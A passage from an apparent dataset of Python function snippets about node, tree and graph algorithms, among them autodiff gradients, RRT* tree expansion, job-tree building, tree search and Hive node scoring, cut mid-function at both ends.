node_to_output_grads_list[output_node] = [oneslike_op(output_node)]\r\n # a map from node to the gradient of that node\r\n node_to_output_grad = {}\r\n # Traverse graph in reverse topological order given the output_node that we are taking gradient wrt.\r\n reverse_topo_order = list(reversed(find_topo_sort([output_node])))\r\n #node_to_output_grad[output_node] = oneslike_op(output_node)\r\n \r\n \r\n \"\"\"TODO: Your code here\"\"\"\r\n \r\n for node in reverse_topo_order:\r\n #print(node)\r\n #print(node_to_output_grad)\r\n if not(node in node_to_output_grad):\r\n #node_to_output_grad[node] = node.op.gradient(node, sum_node_list ([node_to_output_grad[node1] for node1 in node_to_output_grads_list[node] ]))\r\n sum_node = sum_node_list (node_to_output_grads_list[node]) \r\n grad = node.op.gradient(node, sum_node)\r\n node_to_output_grad[node] = sum_node\r\n #print(grad)\r\n #print(len(node.inputs))\r\n for i in range(len(node.inputs)):\r\n #print(i)\r\n if (not(node.inputs[i] in node_to_output_grads_list)):\r\n node_to_output_grads_list[node.inputs[i]]=[]\r\n node_to_output_grads_list[node.inputs[i]].append(grad[i])\r\n \r\n #input_grad = \r\n \r\n \r\n '''for node1 in node_to_output_grads_list[node]:\r\n print(node1)\r\n if (node in node_to_output_grad):\r\n node_to_output_grad[node] = node_to_output_grad[node] + node_to_output_grad[node1]\r\n else:\r\n node_to_output_grad[node] = node_to_output_grad[node1]\r\n '''\r\n #print(\"node to output \")\r\n #print(node_to_output_grad)\r\n\r\n del reverse_topo_order\r\n # Collect results for gradients requested.\r\n grad_node_list = [node_to_output_grad[node] for node in node_list]\r\n return grad_node_list", "def insert_nodes(self):\n neighbour_max_distance = 5\n new_nodes = []\n for node in self.nodes:\n left_distance = node.get_distance(node.neighbour1)\n right_distance = node.get_distance(node.neighbour2)\n if left_distance > neighbour_max_distance:\n # halfway\n half_point = (\n node.x + (node.neighbour1.x - node.x) / 2,\n node.y + (node.neighbour1.y - node.y) / 2\n )\n new_node = Node(half_point)\n node.neighbour1.connect(node.neighbour1.neighbour1, new_node)\n new_node.connect(node.neighbour1, node)\n node.connect(new_node, node.neighbour2)\n new_nodes.append(new_node)\n new_nodes.append(node)\n\n if right_distance > neighbour_max_distance:\n # halfway\n half_point = (\n node.x + (node.neighbour2.x - node.x) / 2,\n node.y + (node.neighbour2.y - node.y) / 2\n )\n new_node = Node(half_point)\n node.neighbour2.connect(new_node, node.neighbour2.neighbour2)\n new_node.connect(node, node.neighbour2)\n node.connect(node.neighbour1, new_node)\n new_nodes.append(new_node)\n\n return new_nodes", "def job_tree(self):\n\n # 1. Enforce depth of 1 for steps\n def depth_one(steps):\n depth_one = []\n for step in steps:\n if type(step) is list:\n if type(step[0]) is list:\n depth_one.append(step[0])\n else:\n depth_one.append(step)\n else:\n depth_one.append([step])\n return depth_one\n\n # 2. Convert steps to list of node objects (0,1,2,3...)\n def assign_nodes(steps):\n nodes = [i for i in range(len(steps))]\n objects = list(\n set([elem for sublist in steps for elem in sublist]))\n\n # checks for multiple src and dst objects -- added when looking for\n # mutiples\n split_objects = []\n for obj in objects:\n if len(obj) > 1:\n new_objs = obj.split(\", \")\n split_objects.extend(new_objs)\n else:\n split_objects.append(obj)\n objects = split_objects\n del(split_objects)\n\n # populate with leafless trees (Node objects, no edges)\n for node in nodes:\n nodes[node] = Node(str(node))\n\n # search for leafy trees\n for obj in objects:\n\n # accounts for multiple drc/dst objects\n leaves = []\n for i, sublist in enumerate(steps):\n for string in sublist:\n if string.count(',') > 0:\n if obj in string:\n leaves.append(i)\n else:\n if obj in sublist:\n leaves.append(i)\n leaves = sorted(list(set(leaves)))\n\n if len(leaves) > 1:\n viable_edges = []\n\n # compute cross-product\n for leaf1 in leaves:\n for leaf2 in leaves:\n if str(leaf1) != str(leaf2) and sorted((leaf1, leaf2)) not in viable_edges:\n viable_edges.append(sorted((leaf1, leaf2)))\n\n # form edge networks\n for edge in viable_edges:\n n1, n2 = nodes[edge[0]], nodes[edge[1]]\n n1.add_edge(n2)\n n2.add_edge(n1)\n nodes[int(n1.name)], nodes[int(n2.name)] = n1, n2\n return nodes\n\n # 3. Determine number of trees and regroup by connected nodes\n def connected_nodes(nodes):\n proto_trees = []\n nodes = set(nodes)\n\n while nodes:\n n = nodes.pop()\n group = {n}\n queue = [n]\n while queue:\n n = queue.pop(0)\n neighbors = n.edges\n neighbors.difference_update(group)\n nodes.difference_update(neighbors)\n group.update(neighbors)\n queue.extend(neighbors)\n proto_trees.append(group)\n return proto_trees\n\n # 4. Convert nodes to nested dictionary of parent-children relations\n # i.e. adding depth -- also deals with tree-node sorting and path\n # optimization\n def build_tree_dict(trees, steps):\n # node sorting in trees\n sorted_trees = []\n for tree in trees:\n sorted_trees.append(\n sorted(tree, key=lambda x: int(x.name)))\n\n # retrieve values of the nodes (the protocol's containers)\n # for each tree ... may want to use dictionary eventually\n all_values = []\n for tree in sorted_trees:\n values = [steps[int(node.name)] for node in tree]\n all_values.append(values)\n\n # create relational tuples:\n all_digs = []\n singles = []\n dst_potentials = []\n for tree_idx in range(len(sorted_trees)):\n edge_flag = False\n tree_digs = []\n for node_idx in range(len(sorted_trees[tree_idx])):\n\n # digs: directed graph vectors\n digs = []\n dst_nodes = []\n node_values = all_values[tree_idx][node_idx]\n src_node = str(sorted_trees[tree_idx][node_idx].name)\n\n # ACTION ON MULTIPLE OBJECTS (E.G. TRANSFER FROM SRC -> DST\n # WELLS)\n # Outcome space: {1-1, 1-many, many-1, many-many}\n if len(node_values) == 2:\n # single destination (x-1)\n if node_values[1].count(\",\") == 0:\n dst_nodes = [i for i, sublist in enumerate(\n steps) if node_values[1] == sublist[0]]\n # multiple destinations (x-many)\n elif node_values[1].count(\",\") > 0:\n dst_nodes = []\n for dst in node_values[1].replace(\", \", \"\"):\n for i, sublist in enumerate(steps):\n if i not in dst_nodes and dst == sublist[0]:\n dst_nodes.append(i)\n\n # ACTION ON A SINGLE OBJECT\n elif len(node_values) == 1:\n dst_nodes = [i for i, sublist in enumerate(\n steps) if node_values[0] == sublist[0]]\n\n # Constructing tuples in (child, parent) format\n for dst_node in dst_nodes:\n dig = (int(dst_node), int(src_node))\n digs.append(dig)\n\n # else: an edge-case for dictionaries constructed with no edges\n # initiates tree separation via flag\n if digs != []:\n edge_flag = False\n tree_digs.append(digs)\n else:\n edge_flag = True\n digs = [(int(src_node), int(src_node))]\n tree_digs.append(digs)\n\n # digraph cycle detection: avoids cycles by overlooking set\n # repeats\n true_tree_digs = []\n for digs in tree_digs:\n for dig in digs:\n if tuple(sorted(dig, reverse=True)) not in true_tree_digs:\n true_tree_digs.append(\n tuple(sorted(dig, reverse=True)))\n\n # edge-case for dictionaries constructed with no edges\n if true_tree_digs != [] and edge_flag == False:\n all_digs.append(true_tree_digs)\n elif edge_flag == True:\n all_digs.extend(tree_digs)\n\n # Enforces forest ordering\n all_digs = sorted(all_digs, key=lambda x: x[0])\n\n # job tree traversal to find all paths:\n forest = []\n for digs_set in all_digs:\n\n # pass 1: initialize nodes dictionary\n nodes = OrderedDict()\n for tup in digs_set:\n id, parent_id = tup\n # ensure all nodes accounted for\n nodes[id] = OrderedDict({'id': id})\n nodes[parent_id] = OrderedDict({'id': parent_id})\n\n # pass 2: create trees and parent-child relations\n for tup in digs_set:\n id, parent_id = tup\n node = nodes[id]\n # links node to its parent\n if id != parent_id:\n # add new_node as child to parent\n parent = nodes[parent_id]\n if not 'children' in parent:\n # ensure parent has a 'children' field\n parent['children'] = []\n children = parent['children']\n children.append(node)\n\n desired_tree_idx = sorted(list(nodes.keys()))[0]\n forest.append(nodes[desired_tree_idx])\n return forest\n\n # 5. Convert dictionary-stored nodes to unflattened, nested list of\n # parent-children relations\n def dict_to_list(forest):\n forest_list = []\n for tree in forest:\n tString = str(json.dumps(tree))\n tString = tString.replace('\"id\": ', \"\").replace('\"children\": ', \"\").replace(\n '[{', \"[\").replace('}]', \"]\").replace('{', \"[\").replace('}', \"]\")\n\n # find largest repeated branch (if applicable)\n # maybe think about using prefix trees or SIMD extensions for better\n # efficiency\n x, y, length, match = 0, 0, 0, ''\n for y in range(len(tString)):\n for x in range(len(tString)):\n substring = tString[y:x]\n if len(list(re.finditer(re.escape(substring), tString))) > 1 and len(substring) > length:\n match = substring\n length = len(substring)\n\n # checking for legitimate branch repeat\n if \"[\" in match and \"]\" in match:\n hits = []\n index = 0\n if len(tString) > 3:\n while index < len(tString):\n index = tString.find(str(match), index)\n if index == -1:\n break\n hits.append(index)\n index += len(match)\n\n # find all locations of repeated branch and remove\n if len(hits) > 1:\n for start_loc in hits[1:]:\n tString = tString[:start_loc] + \\\n tString[start_loc:].replace(match, \"]\", 1)\n\n # increment all numbers in string to match the protocol\n newString = \"\"\n numString = \"\"\n for el in tString:\n if el.isdigit(): # build number\n numString += el\n else:\n if numString != \"\": # convert it to int and reinstantaite numString\n numString = str(int(numString) + 1)\n newString += numString\n newString += el\n numString = \"\"\n tString = newString\n del newString\n\n forest_list.append(ast.literal_eval(tString))\n return forest_list\n\n # 6. Print job tree(s)\n def print_tree(lst, level=0):\n print(' ' * (level - 1) + '+---' * (level > 0) + str(lst[0]))\n for l in lst[1:]:\n if type(l) is list:\n print_tree(l, level + 1)\n else:\n print(' ' * level + '+---' + l)\n\n # 1\n steps = depth_one(self.object_list)\n # 2\n nodes = assign_nodes(steps)\n # 3\n proto_forest = connected_nodes(nodes)\n # 4\n forest = build_tree_dict(proto_forest, steps)\n # 5\n self.forest_list = dict_to_list(forest)\n # 6\n print(\"\\n\" + \"A suggested Job Tree based on container dependency: \\n\")\n for tree_list in self.forest_list:\n print_tree(tree_list)", "def expand_tree(self, N=1):\n # type: (int) -> None\n assert self._initialized, 'Search not initialized.'\n for _ in range(N): \n x_rand = self.sample_free()\n x_nearest = self.nearest(x_rand)\n x_new = self.steer(x_nearest, x_rand)\n if self.coll_free(x_nearest, x_new):\n self.index+=1\n X_near = [x for x in self.near(x_new) if self.coll_free(x, x_new)]\n cost_min = self.costs[self.research_index(self.nodes,x_nearest)][1] + self.dist(x_nearest, x_new)\n x_min = x_nearest\n for x in X_near:\n cost = self.costs[self.research_index(self.nodes,x)][1] + self.dist(x, x_new)\n if cost < cost_min:\n cost_min = cost\n x_min = x\n \n self.nodes.append(x_new)\n j=self.research_index(self.nodes,x_min)\n self.parents[self.index,j]=1\n self.costs[self.index] = (x_new,self.costs[j][1] + self.dist(x_min, x_new))\n for x in X_near:\n k=self.research_index(self.nodes,x)\n if self.costs[self.index][1] + self.dist(x_new, x) < self.costs[k][1]:\n self.parents[self.index]=np.zeros(self.N)\n self.parents[self.index,k] = 1\n self.costs[k] = (self.costs[k][0],self.costs[self.index][1] + self.dist(x_new, x))", "def all_nodes_dfs(log_T, initial_state, min_score, sub_info, max_depth=1000000000000000000, maxtraversals=1000000000000000000):\n # default argument for sub_info: empty_sub_info = (np.array([], dtype=int), np.array([], dtype=int), 1000000000000000000)\n min_score = float(min_score) # make sure numba knows this is a float (otherwise, sometimes, it doesn't (bug in numba))\n order = np.zeros(log_T.shape, np.int64)\n for i in xrange(order.shape[1]):\n order[i] = (-log_T[i]).argsort()\n n_states = log_T.shape[0]\n node = [order[initial_state, 0]] # most likely first node\n node_idx = [0]\n lengths_dfs = [-1.0]\n nodes_dfs = [[-1, ]]\n for it in xrange(maxtraversals):\n # score and return current node if adequate\n score = log_T[initial_state, node[0]]\n for p in xrange(1, len(node)):\n score += log_T[node[p - 1], node[p]]\n if min_score <= score and syntax_check(np.array(node), sub_info, partial=False):\n lengths_dfs.append(-score)\n nodes_dfs.append(list(node))\n # next node ##\n # try adding a value at the end\n for next_idx, next_state in enumerate(order[node[-1]]):\n if min_score <= score + log_T[node[-1], next_state] and len(node) < max_depth \\\n and syntax_check(np.array(node + [next_state]), sub_info, partial=True):\n node.append(next_state)\n node_idx.append(next_idx)\n break\n # adding a value at the end failed, so we are a leave\n else:\n for p in xrange(len(node) - 1, -1, -1):\n if node_idx[p] != n_states - 1: # find where within the node to increase (and discard all others after)\n old_idx = node_idx[p]\n del node_idx[p:]\n del node[p:]\n node_idx.append(old_idx + 1)\n prev_state = node[p - 1] if p > 0 else initial_state\n node.append(order[prev_state, node_idx[p]])\n break\n else:\n break # end of the generator, can't increase even the root\n else:\n assert False, \"Number of traversals exceeded\"\n\n return lengths_dfs[1:], nodes_dfs[1:]", "def find_sharpest_fork_general(Nodes):\n pair_list = []\n Dis = np.array([])\n for n in Nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def get_locations(nodes, tl, br):\n \n # Base cases:\n if len(nodes) == 1: # for singleton, only choice is to place in the single spot in 1x1 square\n return {nodes[0]: tl}\n if len(nodes) == 2: # for two nodes, arbitrarily chose to place the first node in top left\n return {nodes[0]: tl, nodes[1]: br}\n\n # Recursive case, need to create and solve subproblems:\n ret = {}\n\n num_edges = count_num_edges(nodes)\n if num_edges == 0: # for empty graphs, no need to run METIS, just assign arbitrarily\n i = 0\n for x in range(tl.x, br.x+1): \n for y in range(tl.y, br.y+1):\n if i < len(nodes):\n ret.update({nodes[i]: Point(x,y)})\n i += 1\n return ret\n\n filename = splitext(basename(sys.argv[1]))[0] + '.p.' + sys.argv[2] + '.yx.' + sys.argv[3] + '.drop.' + sys.argv[4] + '.' +\\\n '_'.join(['delete', str(tl.x), str(tl.y), str(br.x), str(br.y)]) \n\n # special case for the very first call of get_locations. For example, suppose that there are\n # 97 nodes on a 10x10 grid. Instead of dividing the 97 nodes into 2 equal partitions, we should\n # divide them into a partition of 90 nodes and a partition of 7 nodes. The former should be\n # placed on a 10x9 grid and te latter should be placed on a 1x7 grid.\n if len(nodes) < (br.x - tl.x + 1) * (br.y - tl.y + 1):\n assert tl == Point(0, 0)\n size_tl_nodes = (br.x + 1) * int(len(nodes) / (br.x + 1))\n if size_tl_nodes == len(nodes):\n ret.update(get_locations(nodes, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n return ret\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n # complicated indexing here. As an example, for the 97 into 10x10 case, we want to send 90 nodes\n # to a rectangle spanned by tl=Point(0, 0) and br=Point(9, 8) and we want to send 7 nodes to a \n # rectangle spanned by tl=Point(0, 9) and br=Point(6, 9)\n ret.update(get_locations(nodes_tl, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n ret.update(get_locations(nodes_br, tl=Point(0, len(nodes) / (br.x + 1)), br=Point(len(nodes) % (br.x + 1) - 1, len(nodes) / (br.x + 1))))\n return ret\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n half = tl.x + (br.x - tl.x - 1) / 2\n size_tl_nodes = (half - tl.x + 1) * (br.y - tl.y + 1)\n else: # split on x axis\n half = tl.y + (br.y - tl.y - 1) / 2\n size_tl_nodes = (br.x - tl.x + 1) * (half - tl.y + 1)\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(half, br.y)))\n ret.update(get_locations(nodes_br, tl=Point(half + 1,tl.y), br=br))\n else: # split on x axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(br.x, half)))\n ret.update(get_locations(nodes_br, tl=Point(tl.x, half + 1), br=br))\n\n return ret", "def find_sharpest_fork(nodes):\n pair_list = []\n Dis = np.array([])\n for n in nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n if(len(n1.children) == 0 and len(n2.children) == 0):\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def make_sidewalk_nodes(street, prev_node, curr_node, next_node):\n if prev_node is None:\n v = - curr_node.vector_to(next_node, normalize=False)\n vec_prev = curr_node.vector() + v\n prev_node = Node(None, vec_prev[0], vec_prev[1])\n elif next_node is None:\n v = - curr_node.vector_to(prev_node, normalize=False)\n vec_next = curr_node.vector() + v\n next_node = Node(None, vec_next[0], vec_next[1])\n\n curr_latlng = np.array(curr_node.location())\n\n v_cp_n = curr_node.vector_to(prev_node, normalize=True)\n v_cn_n = curr_node.vector_to(next_node, normalize=True)\n v_sidewalk = v_cp_n + v_cn_n\n\n if np.linalg.norm(v_sidewalk) < 1e-10:\n v_sidewalk_n = np.array([v_cn_n[1], - v_cn_n[0]])\n else:\n v_sidewalk_n = v_sidewalk / np.linalg.norm(v_sidewalk)\n\n p1 = curr_latlng + street.distance_to_sidewalk * v_sidewalk_n\n p2 = curr_latlng - street.distance_to_sidewalk * v_sidewalk_n\n\n p_sidewalk_1 = Node(None, p1[0], p1[1])\n p_sidewalk_2 = Node(None, p2[0], p2[1])\n\n curr_node.append_sidewalk_node(street.id, p_sidewalk_1)\n curr_node.append_sidewalk_node(street.id, p_sidewalk_2)\n\n # Figure out on which side you want to put each sidewalk node\n v_c1 = curr_node.vector_to(p_sidewalk_1)\n if np.cross(v_cn_n, v_c1) > 0:\n return p_sidewalk_1, p_sidewalk_2\n else:\n return p_sidewalk_2, p_sidewalk_1", "def RegenerateWith2Nodes (failed_node, list_of_nodes, name):\n \n list_of_vects = []\n\n for node_index in list_of_nodes:\n list_of_vects = list_of_vects + (map(lambda x: list(x), list(conf.BASIS_VECTORS [node_index])))\n\n array_A = numpy.array(list_of_vects).transpose()\n arrays_B = []\n\n arrays_B = map(lambda x: list(x), list(conf.BASIS_VECTORS [failed_node]))\n\n obj_list = []\n\n for node_index in list_of_nodes:\n for object_index in range(0,conf.PART_SIZE):\n obj_list.append (dist.pull_object_from_stores (name, node_index, object_index))\n\n for each in arrays_B:\n parts_to_pull = numpy.linalg.solve (array_A, numpy.array(each).transpose())\n pack = []\n \n for i in range(0,len(parts_to_pull)):\n if (parts_to_pull[i] != 0):\n pack.append (copy.deepcopy (obj_list[i]))\n\n dist.push_object_to_store (name, failed_node, reduce (numpy.bitwise_xor, pack), arrays_B.index (each))", "def prepare_data_for_g(self):\n\n paths = []\n for i in self.root_nodes:\n if np.random.rand() < config.update_ratio:\n sample, paths_from_i = self.sample(i, self.trees[i], config.n_sample_gen, for_d=False)\n if paths_from_i is not None:\n paths.extend(paths_from_i)\n # for each root, we generate 20 samples, each sample is equal to one path from root to that sample\n # So, we will get maximum (num_root x 20) paths\n # path is a list with length = (N x num_sample), with num_sample = 20\n # paths =[[path_root1_to_sample1],[path_root1_to_sample2],....,[path_root1_to_sample20],\n # [path_root2_to_sample1],[path_root2_to_sample2],....,[path_root2_to sample20]\n # .\n # .\n # [path_rootN_to_sample1],[path_rootN_to_sample2],....,[path_rootN_to_sample20]]\n # get_node_pairs_from_path\n\n node_pairs = list(map(self.get_node_pairs_from_path, paths))\n # node_pairs = [[node pairs for path_root1_to_sample1],[node pairs for path_root1_to_sample2],....,[node pairs for path_root1_to_sample20],\n # [node_pairs for path_root2_to_sample1],[node pairs for path_root2_to_sample2],....,[node pairs for path_root2_to sample20],\n # .\n # .\n # [node pairs for path_rootN_to_sample1],[node pairs for path_rootN_to_sample2],....,[node pairs for path_rootN_to_sample20]]\n\n node_1 = []\n node_2 = []\n for i in range(len(node_pairs)):\n for pair in node_pairs[i]:\n node_1.append(pair[0])\n node_2.append(pair[1])\n # reward = self.sess.run(self.discriminator.reward,\n # feed_dict={self.discriminator.node_id: np.array(node_1),\n # self.discriminator.node_neighbor_id: np.array(node_2)})\n reward = self.discriminator.forward(node_1, node_2)\n return node_1, node_2, reward", "def update_tree(root, executed_acts, total_rew):\n root.value = max(total_rew, root.value)\n root.visits += 1\n new_nodes = 0\n\n node = root\n for step, act in enumerate(executed_acts):\n if act not in node.children:\n node.children[act] = Node()\n new_nodes += 1\n node = node.children[act]\n node.value = max(total_rew, node.value)\n node.visits += 1\n\n return new_nodes", "def newton(backward_differences, max_num_iters, newton_coefficient, ode_fn_vec,\n order, step_size, time, tol, unitary, upper):\n initial_guess = tf.reduce_sum(\n tf1.where(\n tf.range(MAX_ORDER + 1) <= order,\n backward_differences[:MAX_ORDER + 1],\n tf.zeros_like(backward_differences)[:MAX_ORDER + 1]),\n axis=0)\n\n np_dtype = np_dtype = dtype_util.as_numpy_dtype(backward_differences.dtype)\n\n rhs_constant_term = newton_coefficient * tf.reduce_sum(\n tf1.where(\n tf.range(1, MAX_ORDER + 1) <= order,\n RECIPROCAL_SUMS[1:, np.newaxis].astype(np_dtype) *\n backward_differences[1:MAX_ORDER + 1],\n tf.zeros_like(backward_differences)[1:MAX_ORDER + 1]),\n axis=0)\n\n next_time = time + step_size\n step_size_cast = tf.cast(step_size, backward_differences.dtype)\n real_dtype = tf.abs(backward_differences).dtype\n\n def newton_body(iterand):\n \"\"\"Performs one iteration of Newton's method.\"\"\"\n next_backward_difference = iterand.next_backward_difference\n next_state_vec = iterand.next_state_vec\n\n rhs = newton_coefficient * step_size_cast * ode_fn_vec(\n next_time,\n next_state_vec) - rhs_constant_term - next_backward_difference\n delta = tf.squeeze(\n tf.linalg.triangular_solve(\n upper,\n tf.matmul(tf.transpose(unitary), rhs[:, tf.newaxis]),\n lower=False))\n num_iters = iterand.num_iters + 1\n\n next_backward_difference += delta\n next_state_vec += delta\n\n delta_norm = tf.cast(tf.norm(delta), real_dtype)\n lipschitz_const = delta_norm / iterand.prev_delta_norm\n\n # Stop if method has converged.\n approx_dist_to_sol = lipschitz_const / (1. - lipschitz_const) * delta_norm\n close_to_sol = approx_dist_to_sol < tol\n delta_norm_is_zero = tf.equal(delta_norm, tf.constant(0., dtype=real_dtype))\n converged = close_to_sol | delta_norm_is_zero\n finished = converged\n\n # Stop if any of the following conditions are met:\n # (A) We have hit the maximum number of iterations.\n # (B) The method is converging too slowly.\n # (C) The method is not expected to converge.\n too_slow = lipschitz_const > 1.\n finished = finished | too_slow\n if max_num_iters is not None:\n too_many_iters = tf.equal(num_iters, max_num_iters)\n num_iters_left = max_num_iters - num_iters\n num_iters_left_cast = tf.cast(num_iters_left, real_dtype)\n wont_converge = (\n approx_dist_to_sol * lipschitz_const**num_iters_left_cast > tol)\n finished = finished | too_many_iters | wont_converge\n\n return [\n _NewtonIterand(\n converged=converged,\n finished=finished,\n next_backward_difference=next_backward_difference,\n next_state_vec=next_state_vec,\n num_iters=num_iters,\n prev_delta_norm=delta_norm)\n ]\n\n iterand = _NewtonIterand(\n converged=False,\n finished=False,\n next_backward_difference=tf.zeros_like(initial_guess),\n next_state_vec=tf.identity(initial_guess),\n num_iters=0,\n prev_delta_norm=tf.constant(np.array(-0.), dtype=real_dtype))\n [iterand] = tf.while_loop(lambda iterand: tf.logical_not(iterand.finished),\n newton_body, [iterand])\n return (iterand.converged, iterand.next_backward_difference,\n iterand.next_state_vec, iterand.num_iters)", "def recursion_loop(pulls, discount, grid_n):\n\n r_grid = np.linspace(0, 1, grid_n)\n gittins, values = initial_approximation(pulls, discount, grid_n)\n n = pulls - 2 # Note that the 2 comes from (1) the initial approximation and (2) python indexing\n while n >= 1:\n g, v = recursion_step(values[:n + 1, n, :], r_grid, discount)\n values[:n, n - 1] = v\n gittins[:n, n - 1] = g\n n -= 1\n return gittins, values", "def update_nodes(self, weights=None, hive_instance=None):\n hive = hive_instance or shared_hive_instance()\n metadata = None\n account = None\n cnt = 0\n while metadata is None and cnt < 5:\n cnt += 1\n try:\n account = Account(\"fullnodeupdate\", hive_instance=hive)\n metadata = json.loads(account[\"json_metadata\"])\n except:\n hive.rpc.next()\n account = None\n metadata = None\n if metadata is None:\n return\n report = metadata[\"report\"]\n failing_nodes = metadata[\"failing_nodes\"]\n parameter = metadata[\"parameter\"]\n benchmarks = parameter[\"benchmarks\"]\n if weights is None:\n weights_dict = {}\n for benchmark in benchmarks:\n weights_dict[benchmark] = (1. / len(benchmarks))\n elif isinstance(weights, list):\n weights_dict = {}\n i = 0\n weight_sum = 0\n for w in weights:\n weight_sum += w\n for benchmark in benchmarks:\n if i < len(weights):\n weights_dict[benchmark] = weights[i] / weight_sum\n else:\n weights_dict[benchmark] = 0.\n i += 1\n elif isinstance(weights, dict):\n weights_dict = {}\n i = 0\n weight_sum = 0\n for w in weights:\n weight_sum += weights[w]\n for benchmark in benchmarks:\n if benchmark in weights:\n weights_dict[benchmark] = weights[benchmark] / weight_sum\n else:\n weights_dict[benchmark] = 0.\n\n max_score = len(report) + 1\n new_nodes = []\n for node in self:\n new_node = node.copy()\n for report_node in report:\n if node[\"url\"] == report_node[\"node\"]:\n new_node[\"version\"] = report_node[\"version\"]\n scores = []\n for benchmark in benchmarks:\n result = report_node[benchmark]\n rank = result[\"rank\"]\n if not result[\"ok\"]:\n rank = max_score + 1\n score = (max_score - rank) / (max_score - 1) * 100\n weighted_score = score * weights_dict[benchmark]\n scores.append(weighted_score)\n sum_score = 0\n for score in scores:\n sum_score += score\n new_node[\"score\"] = sum_score\n for node_failing in failing_nodes:\n if node[\"url\"] == node_failing:\n new_node[\"score\"] = -1\n new_nodes.append(new_node)\n super(NodeList, self).__init__(new_nodes)", "def solve(self):\n self.left -= len(self.nodes)\n \n def depths(x,depth = 0):\n depth+=1\n for y in self.graph[x]:\n if y in self.nodes:\n self.nodes.remove(y)\n depth = depths(y,depth)\n return depth\n \n while len(self.nodes):\n x = self.nodes.pop()\n self.firstGen.append(depths(x))\n #print self.graph\n #print self.nodes\n #print self.firstGen", "def generate_children_nodes(\n curr_node, list_of_processed_nodes,\n running_count_of_children_dups, a_star_search=False\n):\n children_nodes_to_return = []\n direction_coordinates_map = curr_node.state.get_legal_snake_movement_coords()\n \n for direction, legal_coords in direction_coordinates_map.iteritems():\n curr_state_copy = copy.deepcopy(curr_node.state)\n new_state = State(\n dim=curr_state_copy.dim, num_obstacles=curr_state_copy.num_obstacles,\n grid=curr_state_copy.grid, snake=curr_state_copy.snake\n )\n #pdb.set_trace()#\n new_state.update_state_after_movement(new_head_coords=legal_coords)\n\n new_node_state = new_state\n new_node_action = direction\n new_node_parent_index = curr_node.index\n new_node_depth = curr_node.depth + 1\n\n new_node = Node(\n state=new_node_state, action=new_node_action,\n parent_index=new_node_parent_index, depth=new_node_depth\n )\n\n if not a_star_search:\n if new_node in list_of_processed_nodes:\n running_count_of_children_dups += 1\n continue\n\n children_nodes_to_return.append(new_node)\n\n return children_nodes_to_return, running_count_of_children_dups", "def find_nodes(input_line: str) -> List[Node]:\n li = [int(elem) for elem in input_line.split(\" \")]\n assert len(li) >= 2\n \n # store Nodes in two sets, depending is their processing ready or not\n unfinished = set()\n finished = set()\n \n \n i = 0 # points to the index where to read the input list\n parent = None\n \n # add root node\n global root # global so we can directly grab its value outside this func\n root = Node(num_childs = li[i], num_metadata = li[i+1], children = None, parent = parent)\n print(\"Added root node:\", root)\n \n # Logic for handling the root node\n if root.num_childs > 0:\n unfinished.add(root) # assumes more to come...\n i += 2 # continue from child's first element\n else: # root node does not have children\n finished.add(root)\n i += 2 + num_metadata\n \n parent = root\n \n \n all_done = False # set to True when all nodes has been processed (to break out of the loop)\n \n # now we have a root ready\n while i < len(li):\n #print(i)\n \n while parent.num_child_processed >= parent.num_childs:\n # backtrack a step towards root node!\n # store metadata elements\n parent.metadata = li[i: i+parent.num_metadata]\n \n # calculate node value\n parent.value = sum(parent.children[idx - 1].value for idx in parent.metadata if idx > 0 and idx <= parent.num_childs)\n \n finished.add(parent)\n unfinished.remove(parent)\n i += parent.num_metadata\n \n if parent.parent:\n parent = parent.parent\n else: # was root\n print(\"Backtracking out from root, hence all done\")\n all_done = True\n break\n \n if all_done:\n break\n \n curr_num_childs, curr_num_metadata = li[i], li[i+1]\n \n # create a new node\n curr_node = Node(num_childs = curr_num_childs, num_metadata = curr_num_metadata, children = None, parent = parent)\n #print(\"Found new node:\", curr_num_childs, curr_num_metadata, \"\\t\\tparent:\", parent)\n parent.children.append(curr_node)\n parent.num_child_processed += 1\n \n if curr_num_childs > 0: # current node has children\n unfinished.add(curr_node)\n i = i + 2 # continue with the child\n parent = curr_node # which has current node as its parent\n else: # current node is a leaf node\n curr_node.metadata = li[i+2: i+2+curr_num_metadata]\n # calculate node value\n curr_node.value = sum(curr_node.metadata)\n \n finished.add(curr_node)\n i = i + 2 + curr_num_metadata\n \n return finished", "def getNextNodeUsingCellDiff(kGoalState):\n \n global fringe\n global solutions\n\n \n\n\n\n minNode = None\n minCost = 99999999999\n minNodeIndex = -1\n\n \n pnode = None\n pcost = None\n\n if len(solutions)>0 and solutions[0] != None:\n pnode = solutions[0];\n pcost = getHValueForNode(pnode,kGoalState)\n #print pnode, pcost\n # raw_input()\n \n\n\n\n for idx,node in enumerate(fringe):\n #get the heu. function values\n g_value = getHValueForNode(node,kGoalState)\n \n\n if g_value < minCost:\n minNode = node\n minNodeIndex = idx\n minCost = g_value\n\n\n fringe.pop(minNodeIndex)\n c = getHValueForNode(minNode,kGoalState)\n if pnode != None:\n if c > pcost:\n minNode = None\n \n return minNode", "def _compute_nodes_1d(npts, ilbds1d): # pylint: disable=line-too-long\n if npts % 2 == 0:\n raise ValueError(\"Please enter odd 